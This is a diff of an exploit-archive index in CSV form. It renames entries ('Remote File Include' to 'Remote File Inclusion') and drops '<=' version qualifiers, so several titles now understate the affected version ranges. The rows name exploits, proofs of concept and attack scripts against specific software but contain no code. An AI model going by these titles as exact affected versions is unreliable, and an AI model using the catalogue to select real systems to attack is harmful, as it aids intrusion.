UPNP Long Request Denial of Service",2003-07-23,"David F. Madrid",hardware,dos,0 22951,platforms/windows/remote/22951.html,"Opera 7.20 Mail Client Policy Circumvention",2003-07-23,"Arve Bersvendsen",windows,remote,0 @@ -20180,7 +20180,7 @@ id,file,description,date,author,platform,type,port 22940,platforms/php/webapps/22940.txt,"Drupal 4.1/4.2 - Cross-Site Scripting",2003-07-21,"Ferruh Mavituna",php,webapps,0 22941,platforms/php/webapps/22941.txt,"atomicboard 0.6.2 - Directory Traversal",2003-07-21,gr00vy,php,webapps,0 22967,platforms/windows/remote/22967.txt,"Valve Software Half-Life 1.1 Client - Connection Routine Buffer Overflow (2)",2003-07-29,anonymous,windows,remote,0 -22968,platforms/linux/remote/22968.c,"Valve Software Half-Life Server <= 1.1.1.0 & 3.1.1.1c1 &4.1.1.1a - Multiplayer Request Buffer Overflow",2003-07-29,hkvig,linux,remote,0 +22968,platforms/linux/remote/22968.c,"Valve Software Half-Life Server 1.1.1.0 & 3.1.1.1c1 &4.1.1.1a - Multiplayer Request Buffer Overflow",2003-07-29,hkvig,linux,remote,0 22917,platforms/windows/remote/22917.txt,"Microsoft Windows DCOM RPC Interface Buffer Overrun",2003-08-11,aT4r@3wdesign.es,windows,remote,0 22918,platforms/unix/dos/22918.txt,"IBM U2 UniVerse 10.0.0.9 - uvrestore Buffer Overflow",2003-07-16,kf,unix,dos,0 22919,platforms/windows/remote/22919.txt,"Microsoft ISA Server 2000 - Cross-Site Scripting Vulnerabilities",2003-07-16,"Brett Moore",windows,remote,0 @@ -20191,13 +20191,13 @@ id,file,description,date,author,platform,type,port 22924,platforms/unix/local/22924.c,"Tolis Group BRU 17.0 - Local Root Exploit (2)",2003-07-16,nic,unix,local,0 22925,platforms/php/webapps/22925.txt,"eStore 1.0.1/1.0.2 Settings.inc.php Path Disclosure",2003-07-17,Bosen,php,webapps,0 22926,platforms/multiple/dos/22926.txt,"Witango Server 5.0.1.061 - Remote Cookie Buffer Overflow",2003-07-18,"Next Generation Software",multiple,dos,0 -22927,platforms/php/webapps/22927.txt,"SimpNews 2.0.1/2.13 PATH_SIMPNEWS Remote File Include",2003-07-18,PUPET,php,webapps,0 -22928,platforms/linux/local/22928.pl,"mcrypt <= 2.5.8 - Stack Based Overflow",2012-11-26,Tosh,linux,local,0 +22927,platforms/php/webapps/22927.txt,"SimpNews 2.0.1/2.13 PATH_SIMPNEWS Remote File Inclusion",2003-07-18,PUPET,php,webapps,0 +22928,platforms/linux/local/22928.pl,"mcrypt 2.5.8 - Stack Based Overflow",2012-11-26,Tosh,linux,local,0 22929,platforms/php/webapps/22929.txt,"BuyClassifiedScript PHP Code Injection",2012-11-26,d3b4g,php,webapps,0 22931,platforms/windows/local/22931.py,"BlazeVideo HDTV Player 6.6 Professional (Direct Retn)",2012-11-26,Nezim,windows,local,0 22932,platforms/windows/local/22932.py,"Aviosoft Digital TV Player Professional 1.x - (Direct Retn)",2012-11-26,Nezim,windows,local,0 22961,platforms/php/webapps/22961.txt,"Gallery 1.2/1.3.x Search Engine Cross-Site Scripting",2003-07-27,"Larry Nguyen",php,webapps,0 -23006,platforms/php/remote/23006.rb,"Network Shutdown Module <= 3.21 - (sort_values) Remote PHP Code Injection",2012-11-29,Metasploit,php,remote,0 +23006,platforms/php/remote/23006.rb,"Network Shutdown Module 3.21 - (sort_values) Remote PHP Code Injection",2012-11-29,Metasploit,php,remote,0 23007,platforms/windows/local/23007.rb,"Windows AlwaysInstallElevated MSI",2012-11-29,Metasploit,windows,local,0 23008,platforms/php/webapps/23008.txt,"DCForum+ 1.2 Subject Field HTML Injection",2003-08-11,G00db0y,php,webapps,0 23009,platforms/php/webapps/23009.txt,"Stellar Docs 1.2 Path Disclosure",2003-08-11,G00db0y,php,webapps,0 @@ -20212,7 +20212,7 @@ id,file,description,date,author,platform,type,port 22936,platforms/php/webapps/22936.txt,"SmartCMS (index.php idx parameter) SQL Injection",2012-11-26,NoGe,php,webapps,0 22937,platforms/php/webapps/22937.txt,"PRADO PHP Framework 3.2.0 - Arbitrary File Read",2012-11-26,LiquidWorm,php,webapps,0 22960,platforms/php/webapps/22960.txt,"PBLang 4.0/4.56 Bulletin Board System IMG Tag HTML Injection",2003-07-28,"Quan Van Truong",php,webapps,0 -22938,platforms/linux/dos/22938.py,"mcrypt <= 2.6.8 stack-based Buffer Overflow PoC",2012-11-26,_ishikawa,linux,dos,0 +22938,platforms/linux/dos/22938.py,"mcrypt 2.6.8 stack-based Buffer Overflow PoC",2012-11-26,_ishikawa,linux,dos,0 22939,platforms/unix/local/22939.pl,"GNU GNATS 3.113.1_6 - Queue-PR Database Command Line Option Buffer Overflow",2003-07-21,inv[at]dtors,unix,local,0 22969,platforms/linux/remote/22969.c,"Valve Software Half-Life Server 3.1.1.0 - Multiplayer Request Buffer Overflow",2003-07-29,KnbykL,linux,remote,0 22970,platforms/windows/dos/22970.txt,"NetScreen ScreenOS 4.0.1/4.0.3 TCP Window Size Remote Denial of Service",2003-07-29,"Papa loves Mambo",windows,dos,0 @@ -20261,7 +20261,7 @@ id,file,description,date,author,platform,type,port 23024,platforms/multiple/remote/23024.txt,"SurgeLDAP 1.0 d Path Disclosure",2003-08-13,"Ziv Kamir",multiple,remote,0 23025,platforms/cgi/webapps/23025.txt,"SurgeLDAP 1.0 d User.CGI Cross-Site Scripting",2003-08-13,"Ziv Kamir",cgi,webapps,0 23026,platforms/php/webapps/23026.txt,"Xoops 1.0/1.3.x BBCode HTML Injection",2003-08-13,frog,php,webapps,0 -23027,platforms/php/webapps/23027.txt,"HolaCMS 1.2.x HTMLtags.php Local File Include",2003-08-13,"Virginity Security",php,webapps,0 +23027,platforms/php/webapps/23027.txt,"HolaCMS 1.2.x HTMLtags.php Local File Inclusion",2003-08-13,"Virginity Security",php,webapps,0 23028,platforms/php/webapps/23028.txt,"Free Hosting Manager 2.0 - (packages.php id param) SQL Injection",2012-11-30,"Yakir Wizman",php,webapps,0 23029,platforms/php/webapps/23029.txt,"SmartCMS (index.php menuitem param) SQL Injection & Cross-Site Scripting Vulnerabilities",2012-11-30,"Yakir Wizman",php,webapps,0 23032,platforms/asp/webapps/23032.txt,"Clickcess ChitChat.NET name XSS",2003-08-13,G00db0y,asp,webapps,0 @@ -20286,11 +20286,11 @@ id,file,description,date,author,platform,type,port 23054,platforms/linux/remote/23054.txt,"WIDZ 1.0/1.5 - Remote Root Compromise",2003-08-23,kf,linux,remote,0 23055,platforms/asp/webapps/23055.txt,"IdealBB 1.4.9 Beta HTML Injection",2003-08-23,"Scott M",asp,webapps,0 23056,platforms/windows/dos/23056.c,"OptiSoft Blubster 2.5 - Remote Denial of Service Attack",2003-08-25,"Luca Ercoli",windows,dos,0 -23057,platforms/php/webapps/23057.txt,"newsPHP 216 - Remote File Include",2003-08-25,Officerrr,php,webapps,0 +23057,platforms/php/webapps/23057.txt,"newsPHP 216 - Remote File Inclusion",2003-08-25,Officerrr,php,webapps,0 23058,platforms/php/webapps/23058.txt,"newsPHP 216 - Authentication Bypass",2003-08-25,Officerrr,php,webapps,0 23059,platforms/cgi/webapps/23059.txt,"Netbula Anyboard 9.9.5 6 Information Disclosure",2003-08-25,"cyber talon",cgi,webapps,0 23060,platforms/php/webapps/23060.txt,"Py-Membres 4.x Secure.php Unauthorized Access",2003-08-26,frog,php,webapps,0 -23061,platforms/php/webapps/23061.txt,"Py-Membres 4.x Pass_done.php Remote SQL Injection",2003-08-26,frog,php,webapps,0 +23061,platforms/php/webapps/23061.txt,"Py-Membres 4.x Pass_done.php SQL Injection",2003-08-26,frog,php,webapps,0 23062,platforms/bsd/local/23062.c,"BSD-Games 2.x Monop Player Name Local Buffer Overrun (1)",2003-08-25,^sq,bsd,local,0 23063,platforms/bsd/local/23063.c,"BSD-Games 2.x Monop Player Name Local Buffer Overrun (2)",2003-08-25,N4rK07IX,bsd,local,0 23064,platforms/php/webapps/23064.txt,"Attila PHP 3.0 - SQL Injection Unauthorized Privileged Access",2003-08-26,frog,php,webapps,0 @@ -20444,7 +20444,7 @@ id,file,description,date,author,platform,type,port 23215,platforms/windows/dos/23215.html,"Microsoft Internet Explorer 6 Absolute Position Block Denial of Service",2003-10-03,"Nick Johnson",windows,dos,0 23216,platforms/windows/dos/23216.txt,"Microsoft Word 97/98/2002 Malformed Document Denial of Service",2003-10-03,"Bahaa Naamneh",windows,dos,0 23217,platforms/cgi/webapps/23217.txt,"Divine Content Server 5.0 Error Page Cross-Site Scripting",2003-10-03,valgasu,cgi,webapps,0 -23218,platforms/php/webapps/23218.txt,"EternalMart Mailing List Manager 1.32 - Remote File Include Vulnerabilities",2003-10-04,frog,php,webapps,0 +23218,platforms/php/webapps/23218.txt,"EternalMart Mailing List Manager 1.32 - Remote File Inclusion Vulnerabilities",2003-10-04,frog,php,webapps,0 23219,platforms/php/webapps/23219.txt,"GuppY 2.4 - Cross-Site Scripting",2003-10-05,frog,php,webapps,0 23220,platforms/php/webapps/23220.txt,"GuppY 2.4 - Remote File Access",2003-10-05,frog,php,webapps,0 23221,platforms/multiple/remote/23221.txt,"JBoss 3.0.8/3.2.1 HSQLDB Remote Command Injection",2003-10-06,"Marc Schoenefeld",multiple,remote,0 @@ -20457,13 +20457,13 @@ id,file,description,date,author,platform,type,port 23229,platforms/windows/remote/23229.cpp,"Microsoft Windows XP/2000/2003 Message Queuing Service Heap Overflow",2003-10-07,DaveK,windows,remote,0 23230,platforms/multiple/remote/23230.txt,"Adobe SVG Viewer 3.0 postURL/getURL Restriction Bypass",2003-10-07,"GreyMagic Software",multiple,remote,0 23231,platforms/multiple/dos/23231.txt,"Medieval Total War 1.0/1.1 - nickname Denial of Service",2003-10-07,"Luigi Auriemma",multiple,dos,0 -23232,platforms/php/webapps/23232.txt,"PayPal Store Front 3.0 - 'index.php' Remote File Include",2003-10-08,"Zone-h Security Team",php,webapps,0 +23232,platforms/php/webapps/23232.txt,"PayPal Store Front 3.0 - 'index.php' Remote File Inclusion",2003-10-08,"Zone-h Security Team",php,webapps,0 23233,platforms/php/webapps/23233.txt,"GeekLog 1.3.x HTML Injection Vulnerabilities",2003-10-08,Jelmer,php,webapps,0 23234,platforms/windows/dos/23234.c,"Centrinity FirstClass 5.50/5.77/7.0/7.1 - HTTP Server Long Version Field Denial of Service",2003-10-08,I2S-LaB,windows,dos,0 23235,platforms/windows/dos/23235.txt,"OpenOffice 1.0.1 - Remote Access Denial of Service",2003-10-08,"Marc Schoenefeld",windows,dos,0 23236,platforms/hp-ux/dos/23236.txt,"HP-UX 11 CDE DTPrintInfo Display Environment Variable Buffer Overflow",2003-10-08,"Davide Del Vecchio",hp-ux,dos,0 23237,platforms/php/webapps/23237.pl,"PHP-Nuke 6.6 admin.php SQL Injection",2003-10-08,1dt.w0lf,php,webapps,0 -23238,platforms/php/webapps/23238.txt,"Gallery 1.4 index.php Remote File Include",2003-10-11,peter,php,webapps,0 +23238,platforms/php/webapps/23238.txt,"Gallery 1.4 index.php Remote File Inclusion",2003-10-11,peter,php,webapps,0 23239,platforms/linux/dos/23239.c,"IRCnet IRCD 2.10 - Local Buffer Overflow",2003-10-13,millhouse,linux,dos,0 23240,platforms/windows/dos/23240.pl,"mIRC 6.1 DCC SEND Buffer Overflow (1)",2003-10-13,"Takara Takaishi",windows,dos,0 23241,platforms/windows/dos/23241.pl,"mIRC 6.1 DCC SEND Buffer Overflow (2)",2003-10-13,DarkAngel,windows,dos,0 @@ -20529,7 +20529,7 @@ id,file,description,date,author,platform,type,port 23299,platforms/linux/local/23299.c,"IWConfig Local ARGV Command Line Buffer Overflow (1)",2003-10-27,axis,linux,local,0 23300,platforms/linux/local/23300.c,"IWConfig Local ARGV Command Line Buffer Overflow (2)",2003-11-11,heka,linux,local,0 23301,platforms/linux/local/23301.c,"IWConfig Local ARGV Command Line Buffer Overflow (3)",2003-10-27,NrAziz,linux,local,0 -23302,platforms/php/webapps/23302.txt,"Les Visiteurs 2.0 - Remote File Include",2003-10-27,"Matthieu Peschaud",php,webapps,0 +23302,platforms/php/webapps/23302.txt,"Les Visiteurs 2.0 - Remote File Inclusion",2003-10-27,"Matthieu Peschaud",php,webapps,0 23303,platforms/linux/local/23303.c,"Musicqueue 0.9/1.0/1.1 - Multiple Buffer Overrun Vulnerabilities",2003-10-27,"dong-h0un U",linux,local,0 23304,platforms/cgi/remote/23304.txt,"Symantec Norton Internet Security 2003 6.0.4.34 - Error Message Cross-Site Scripting",2003-10-27,KrazySnake,cgi,remote,0 23305,platforms/linux/dos/23305.c,"thttpd 2.2x defang Remote Buffer Overflow (1)",2003-10-27,"Joel Soderberg",linux,dos,0 @@ -20582,7 +20582,7 @@ id,file,description,date,author,platform,type,port 23354,platforms/php/webapps/23354.txt,"MyBB AJAX Chat - Persistent XSS",2012-12-13,"Mr. P-teo",php,webapps,0 23355,platforms/php/webapps/23355.txt,"Facebook Profile MyBB Plugin 2.4 - Persistant XSS",2012-12-13,limb0,php,webapps,0 23356,platforms/php/webapps/23356.txt,"Portable phpMyAdmin WordPress Plugin - Authentication Bypass",2012-12-13,"Mark Stanislav",php,webapps,0 -23384,platforms/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 $path Remote File Include",2003-11-17,"RusH security team",php,webapps,0 +23384,platforms/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 $path Remote File Inclusion",2003-11-17,"RusH security team",php,webapps,0 23385,platforms/multiple/remote/23385.txt,"PostMaster 3.16/3.17 Proxy Service Cross-Site Scripting",2003-11-17,"Ziv Kamir",multiple,remote,0 23382,platforms/php/webapps/23382.txt,"Social Sites MyBB Plugin 0.2.2 - Cross-Site Scripting",2012-12-14,s3m00t,php,webapps,0 23386,platforms/php/webapps/23386.txt,"Justin Hagstrom Auto Directory Index 1.2.3 - Cross-Site Scripting",2003-11-17,"David Sopas Ferreira",php,webapps,0 @@ -20668,7 +20668,7 @@ id,file,description,date,author,platform,type,port 23445,platforms/php/webapps/23445.txt,"osCommerce 2.2 osCsid Parameter Cross-Site Scripting",2003-12-17,JeiAr,php,webapps,0 23446,platforms/windows/remote/23446.txt,"GoAhead Webserver 2.1.x ASP Script File Source Code Disclosure",2002-12-17,"Luigi Auriemma",windows,remote,0 23447,platforms/cgi/webapps/23447.txt,"SiteInteractive Subscribe Me Setup.PL Arbitrary Command Execution",2003-12-18,"Paul Craig",cgi,webapps,0 -23448,platforms/php/webapps/23448.php,"phpwcms <= 1.5.4.6 - 'preg_replace' Multiple Vulnerabilities",2012-12-17,aeon,php,webapps,0 +23448,platforms/php/webapps/23448.php,"phpwcms 1.5.4.6 - 'preg_replace' Multiple Vulnerabilities",2012-12-17,aeon,php,webapps,0 23453,platforms/php/webapps/23453.txt,"BES-CMS 0.4/0.5 index.inc.php File Include",2003-12-20,frog,php,webapps,0 23454,platforms/php/webapps/23454.txt,"BES-CMS 0.4/0.5 members/index.inc.php File Include",2003-12-20,frog,php,webapps,0 23455,platforms/php/webapps/23455.txt,"BES-CMS 0.4/0.5 message.php File Include",2003-12-20,frog,php,webapps,0 @@ -20692,7 +20692,7 @@ id,file,description,date,author,platform,type,port 23473,platforms/php/webapps/23473.txt,"My Little Forum 1.3 Email.php Cross-Site Scripting",2003-12-23,"David S. Ferreira",php,webapps,0 23474,platforms/php/webapps/23474.txt,"Webfroot Shoutbox 2.32 Viewshoutbox.php Cross-Site Scripting",2003-12-23,"Ben Drysdale",php,webapps,0 23475,platforms/php/webapps/23475.txt,"phpBB 2.0.6 - Privmsg.php Cross-Site Scripting",2003-12-23,"Ben Drysdale",php,webapps,0 -23476,platforms/php/webapps/23476.txt,"KnowledgeBuilder 2.0/2.1/3.0 - Remote File Include",2003-12-24,"Zero X",php,webapps,0 +23476,platforms/php/webapps/23476.txt,"KnowledgeBuilder 2.0/2.1/3.0 - Remote File Inclusion",2003-12-24,"Zero X",php,webapps,0 23477,platforms/php/webapps/23477.txt,"Psychoblogger PB-beta1 desc Parameter XSS",2003-12-24,"Andrew Smith",php,webapps,0 23478,platforms/php/webapps/23478.txt,"Psychoblogger PB-beta1 errormessage XSS",2003-12-24,"Andrew Smith",php,webapps,0 23479,platforms/linux/local/23479.sh,"GNU Indent 2.2.9 - Local Heap Overflow",2003-12-26,"Pooh Hacking Squadron",linux,local,0 @@ -20738,7 +20738,7 @@ id,file,description,date,author,platform,type,port 23517,platforms/php/webapps/23517.txt,"HotNews 0.x - hotnews-engine.inc.php3 config[header] Parameter Remote File Inclusion",2004-01-05,Officerrr,php,webapps,0 23518,platforms/php/webapps/23518.txt,"HotNews 0.x - config[incdir] Parameter Remote File Inclusion",2004-01-05,Officerrr,php,webapps,0 23519,platforms/php/webapps/23519.txt,"FreznoShop 1.2.3/1.3 - Search Script Cross-Site Scripting",2004-01-04,"David S. Ferreira",php,webapps,0 -23520,platforms/php/webapps/23520.txt,"PhpGedView 2.61 - Multiple PHP Remote File Include Vulnerabilities",2004-01-06,Windak,php,webapps,0 +23520,platforms/php/webapps/23520.txt,"PhpGedView 2.61 - Multiple PHP Remote File Inclusion Vulnerabilities",2004-01-06,Windak,php,webapps,0 23691,platforms/php/webapps/23691.txt,"VBulletin 3.0 - Search.php Cross-Site Scripting",2004-02-13,"Rafel Ivgi The-Insider",php,webapps,0 23692,platforms/windows/dos/23692.txt,"Sami FTP Server 1.1.3 Invalid Command Argument Local DoS",2004-02-13,"intuit e.b.",windows,dos,0 23522,platforms/multiple/remote/23522.rb,"NetWin SurgeFTP Authenticated Admin Command Injection (Metasploit)",2012-12-20,"Spencer McIntyre",multiple,remote,0 @@ -20772,7 +20772,7 @@ id,file,description,date,author,platform,type,port 23550,platforms/cgi/webapps/23550.txt,"MetaDot Portal Server 5.6.x index.pl Multiple Parameter XSS",2004-01-16,JeiAr,cgi,webapps,0 23551,platforms/cgi/webapps/23551.txt,"MetaDot Portal Server 5.6.x userchannel.pl op Parameter XSS",2004-01-16,JeiAr,cgi,webapps,0 23552,platforms/windows/remote/23552.xml,"Sun J2EE/RI 1.4_Sun JDK 1.4.2 JDBC Database Insecure Default Policy Vulnerabilities",2004-01-19,"Marc Schoenefeld",windows,remote,0 -23553,platforms/php/webapps/23553.php,"Mambo Open Source 4.5/4.6 mod_mainmenu.php Remote File Include",2004-01-19,Yo_Soy,php,webapps,0 +23553,platforms/php/webapps/23553.php,"Mambo Open Source 4.5/4.6 mod_mainmenu.php Remote File Inclusion",2004-01-19,Yo_Soy,php,webapps,0 23554,platforms/php/webapps/23554.java,"YABB SE 1.x SSI.php ID_MEMBER SQL Injection",2004-01-19,BaCkSpAcE,php,webapps,0 23555,platforms/windows/remote/23555.txt,"GoAhead WebServer 2.1.x - Directory Management Policy Bypass",2004-01-19,"Luigi Auriemma",windows,remote,0 23556,platforms/multiple/dos/23556.txt,"GetWare Web Server Component Content-Length Value Remote Denial of Service",2004-01-19,"Luigi Auriemma",multiple,dos,0 @@ -20789,7 +20789,7 @@ id,file,description,date,author,platform,type,port 23568,platforms/windows/dos/23568.txt,"Sony PC Companion 2.1 - (CheckCompatibility()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 23569,platforms/windows/dos/23569.txt,"Sony PC Companion 2.1 - (Admin_RemoveDirectory()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 23571,platforms/asp/webapps/23571.txt,"SelectSurvey CMS (ASP.NET) Arbitrary File Upload",2012-12-21,040,asp,webapps,0 -23572,platforms/hardware/webapps/23572.txt,"YeaLink IP Phone SIP-TxxP firmware <= 9.70.0.100 - Multiple Vulnerabilities",2012-12-21,xistence,hardware,webapps,0 +23572,platforms/hardware/webapps/23572.txt,"YeaLink IP Phone SIP-TxxP firmware 9.70.0.100 - Multiple Vulnerabilities",2012-12-21,xistence,hardware,webapps,0 23573,platforms/php/webapps/23573.txt,"banana dance b.2.6 - Multiple Vulnerabilities",2012-12-21,"High-Tech Bridge SA",php,webapps,0 23574,platforms/windows/dos/23574.txt,"FireFly Mediaserver 1.0.0.1359 NULL Pointer Dereference",2012-12-21,"High-Tech Bridge SA",windows,dos,0 23575,platforms/php/webapps/23575.txt,"Elite Bulletin Board 2.1.21 - Multiple SQL Injection Vulnerabilities",2012-12-21,"High-Tech Bridge SA",php,webapps,0 @@ -20824,7 +20824,7 @@ id,file,description,date,author,platform,type,port 23604,platforms/linux/remote/23604.txt,"Antologic Antolinux 1.0 - Administrative Interface NDCR Parameter Remote Command Execution",2004-01-26,"Himeur Nourredine",linux,remote,0 23605,platforms/solaris/remote/23605.txt,"Cherokee 0.1.x/0.2.x/0.4.x Error Page Cross-Site Scripting",2004-01-26,"César Fernández",solaris,remote,0 23606,platforms/php/webapps/23606.txt,"Xoops 2.0.x Viewtopic.php Cross-Site Scripting",2004-01-26,"Ben Drysdale",php,webapps,0 -23607,platforms/php/webapps/23607.txt,"Kietu 2/3 Index.php Remote File Include",2004-01-26,"Himeur Nourredine",php,webapps,0 +23607,platforms/php/webapps/23607.txt,"Kietu 2/3 Index.php Remote File Inclusion",2004-01-26,"Himeur Nourredine",php,webapps,0 23608,platforms/windows/remote/23608.pl,"InternetNow ProxyNow 2.6/2.75 - Multiple Stack and Heap Overflow Vulnerabilities",2004-01-26,"Peter Winter-Smith",windows,remote,0 23609,platforms/unix/local/23609.sh,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (1)",2003-08-08,pask,unix,local,0 23610,platforms/unix/local/23610.c,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (2)",2003-08-08,pask,unix,local,0 @@ -20834,7 +20834,7 @@ id,file,description,date,author,platform,type,port 23614,platforms/windows/dos/23614.txt,"Loom Software SurfNow 1.x/2.x - Remote HTTP GET Request Denial of Service",2004-01-28,"Donato Ferrante",windows,dos,0 23615,platforms/cgi/webapps/23615.txt,"PJ CGI Neo Review Directory Traversal",2004-01-29,"Zone-h Security Team",cgi,webapps,0 23616,platforms/php/webapps/23616.txt,"PhpGedView 2.x Editconfig_gedcom.php Directory Traversal",2004-01-30,"Cedric Cochin",php,webapps,0 -23617,platforms/php/webapps/23617.txt,"PhpGedView 2.x - [GED_File]_conf.php Remote File Include",2004-01-30,"Cedric Cochin",php,webapps,0 +23617,platforms/php/webapps/23617.txt,"PhpGedView 2.x - [GED_File]_conf.php Remote File Inclusion",2004-01-30,"Cedric Cochin",php,webapps,0 23618,platforms/php/webapps/23618.txt,"JBrowser 1.0/2.x Browser.php Directory Traversal",2004-01-30,"Himeur Nourredine",php,webapps,0 23619,platforms/php/webapps/23619.txt,"Laurent Adda Les Commentaires 2.0 PHP Script fonctions.lib.php Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0 23620,platforms/php/webapps/23620.txt,"Laurent Adda Les Commentaires 2.0 PHP Script derniers_commentaires.php Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0 @@ -20940,7 +20940,7 @@ id,file,description,date,author,platform,type,port 23732,platforms/windows/remote/23732.c,"PSOProxy 0.91 - Remote Buffer Overflow (1)",2004-02-20,PaLbOsA,windows,remote,0 23733,platforms/windows/remote/23733.c,"PSOProxy 0.91 - Remote Buffer Overflow (2)",2004-02-20,Li0n7,windows,remote,0 23734,platforms/windows/remote/23734.c,"PSOProxy 0.91 - Remote Buffer Overflow (3)",2004-02-20,NoRpiuS,windows,remote,0 -23735,platforms/hardware/remote/23735.py,"Ubiquiti AirOS <= 5.5.2 - Remote POST-Auth Root Command Execution",2012-12-29,xistence,hardware,remote,0 +23735,platforms/hardware/remote/23735.py,"Ubiquiti AirOS 5.5.2 - Remote POST-Auth Root Command Execution",2012-12-29,xistence,hardware,remote,0 23736,platforms/windows/remote/23736.rb,"IBM Lotus iNotes dwa85W ActiveX Buffer Overflow",2012-12-31,Metasploit,windows,remote,0 23737,platforms/windows/remote/23737.rb,"IBM Lotus QuickR qp2 - ActiveX Buffer Overflow",2012-12-31,Metasploit,windows,remote,0 23738,platforms/linux/local/23738.c,"LGames LBreakout2 2.2.2 - Multiple Environment Variable Buffer Overflow Vulnerabilites",2004-02-21,Li0n7,linux,local,0 @@ -21034,8 +21034,8 @@ id,file,description,date,author,platform,type,port 23825,platforms/php/webapps/23825.txt,"Mambo Open Source 4.5 index.php mos_change_template Parameter XSS",2004-03-16,JeiAr,php,webapps,0 23828,platforms/php/webapps/23828.txt,"e107 1.0.1 - CSRF Resulting in Arbitrary Javascript Execution",2013-01-02,"Joshua Reynolds",php,webapps,0 23829,platforms/php/webapps/23829.txt,"e107 1.0.2 - CSRF Resulting in SQL Injection",2013-01-02,"Joshua Reynolds",php,webapps,0 -23830,platforms/linux/dos/23830.py,"Astium VoIP PBX <= 2.1 build 25399 - Remote Crash PoC",2013-01-02,xistence,linux,dos,5655 -23831,platforms/php/webapps/23831.py,"Astium VoIP PBX <= 2.1 build 25399 - Multiple Vulnerabilities/Remote Root Exploit",2013-01-02,xistence,php,webapps,0 +23830,platforms/linux/dos/23830.py,"Astium VoIP PBX 2.1 build 25399 - Remote Crash PoC",2013-01-02,xistence,linux,dos,5655 +23831,platforms/php/webapps/23831.py,"Astium VoIP PBX 2.1 build 25399 - Multiple Vulnerabilities/Remote Root Exploit",2013-01-02,xistence,php,webapps,0 23902,platforms/multiple/dos/23902.txt,"Roger Wilco Server 1.4.1 UDP Datagram Handling Denial of Service",2004-03-31,"Luigi Auriemma",multiple,dos,0 23834,platforms/php/webapps/23834.txt,"Mambo Open Source 4.5 Index.php SQL Injection",2004-03-16,JeiAr,php,webapps,0 23835,platforms/php/webapps/23835.txt,"PHP-Nuke 6.x/7.0/7.1 Image Tag Admin Command Execution",2004-03-16,"Janek Vind",php,webapps,0 @@ -21143,8 +21143,8 @@ id,file,description,date,author,platform,type,port 23941,platforms/cgi/webapps/23941.txt,"1st Class Mail Server 4.0 1 - advanced.tagz XSS",2004-04-08,dr_insane,cgi,webapps,0 23942,platforms/cgi/webapps/23942.txt,"1st Class Mail Server 4.0 1 - list.tagz XSS",2004-04-08,dr_insane,cgi,webapps,0 23943,platforms/linux/dos/23943.txt,"Crackalaka IRC Server 1.0.8 - Remote Denial of Service",2004-04-09,"Donato Ferrante",linux,dos,0 -23944,platforms/windows/dos/23944.php,"Foxit Reader <= 5.4.4.1128 Firefox Plugin npFoxitReaderPlugin.dll Stack Buffer Overflow",2013-01-07,rgod,windows,dos,0 -23945,platforms/unix/dos/23945.txt,"Ettercap <= 0.7.5.1 - Stack Overflow",2013-01-07,"Sajjad Pourali",unix,dos,0 +23944,platforms/windows/dos/23944.php,"Foxit Reader 5.4.4.1128 Firefox Plugin npFoxitReaderPlugin.dll Stack Buffer Overflow",2013-01-07,rgod,windows,dos,0 +23945,platforms/unix/dos/23945.txt,"Ettercap 0.7.5.1 - Stack Overflow",2013-01-07,"Sajjad Pourali",unix,dos,0 23946,platforms/linux/dos/23946.c,"Linux Kernel 2.4 / 2.6 - Sigqueue Blocking Denial of Service",2004-04-12,"Nikita V. Youshchenko",linux,dos,0 23947,platforms/php/webapps/23947.txt,"TikiWiki Project 1.8 tiki-switch_theme.php theme Parameter XSS",2004-04-12,JeiAr,php,webapps,0 23948,platforms/php/webapps/23948.txt,"TikiWiki Project 1.8 img/wiki_up Arbitrary File Upload",2004-04-12,JeiAr,php,webapps,0 @@ -21178,7 +21178,7 @@ id,file,description,date,author,platform,type,port 23977,platforms/php/webapps/23977.txt,"TikiWiki Project 1.8 tiki-list_blogs.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23978,platforms/php/webapps/23978.txt,"TikiWiki Project 1.8 tiki-usermenu.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 33401,platforms/php/webapps/33401.txt,"Million Pixel Script 3 - 'pa' Parameter Cross-Site Scripting",2009-12-14,bi0,php,webapps,0 -33402,platforms/linux/remote/33402.txt,"Ruby on Rails <= 2.3.5 - 'protect_from_forgery' Cross-Site Request Forgery",2009-12-14,p0deje,linux,remote,0 +33402,platforms/linux/remote/33402.txt,"Ruby on Rails 2.3.5 - 'protect_from_forgery' Cross-Site Request Forgery",2009-12-14,p0deje,linux,remote,0 23982,platforms/php/webapps/23982.txt,"TikiWiki Project 1.8 tiki-list_faqs.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23983,platforms/php/webapps/23983.txt,"TikiWiki Project 1.8 tiki-list_trackers.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23984,platforms/php/webapps/23984.txt,"TikiWiki Project 1.8 tiki-list_blogs.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 @@ -21204,7 +21204,7 @@ id,file,description,date,author,platform,type,port 24006,platforms/php/webapps/24006.txt,"phpBugTracker 0.9 query.php Multiple Parameter XSS",2004-04-15,JeiAr,php,webapps,0 24007,platforms/php/webapps/24007.txt,"phpBugTracker 0.9 - user.php bugid Parameter XSS",2004-04-15,JeiAr,php,webapps,0 24008,platforms/php/webapps/24008.html,"SCT Campus Pipeline 1.0/2.x/3.x Email Attachment Script Injection",2004-04-15,"spiffomatic 64",php,webapps,0 -24009,platforms/php/webapps/24009.txt,"Gemitel 3.50 Affich.php Remote File Include Command Injection",2004-04-15,jaguar,php,webapps,0 +24009,platforms/php/webapps/24009.txt,"Gemitel 3.50 Affich.php Remote File Inclusion Command Injection",2004-04-15,jaguar,php,webapps,0 24010,platforms/windows/dos/24010.txt,"Real Networks Helix Universal Server 9.0.x - Denial of Service",2004-04-15,anonymous,windows,dos,0 24011,platforms/multiple/dos/24011.pl,"KPhone 2.x/3.x/4.0.1 Malformed STUN Packet Denial of Service",2004-04-08,storm,multiple,dos,0 